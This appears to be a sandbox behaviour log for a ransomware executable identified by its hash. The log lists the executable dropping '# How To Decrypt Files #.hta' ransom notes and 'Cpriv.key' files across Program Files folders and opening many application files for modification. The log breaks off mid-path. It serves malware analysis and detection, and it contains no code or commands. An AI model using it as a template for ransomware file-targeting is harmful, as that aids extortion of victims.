de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Photo Viewer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\Bibliography\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Contacts.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN001.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PUBWIZ\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EssentialLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL016.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Outlook.en-us\OutlookMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Hardcover.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART4.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\LightSpirit.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Client.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\BlockImport.xhtml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01590_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ApothecaryLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01660_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\CLICK.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR25F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Components\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\an\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\install.ins de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00788_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DVDHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01253_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Elemental.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\.lastModified de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\Accessories\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETSM.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_buttongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297269.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Photo Viewer\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\it.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\directshowtap.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21337_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090149.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 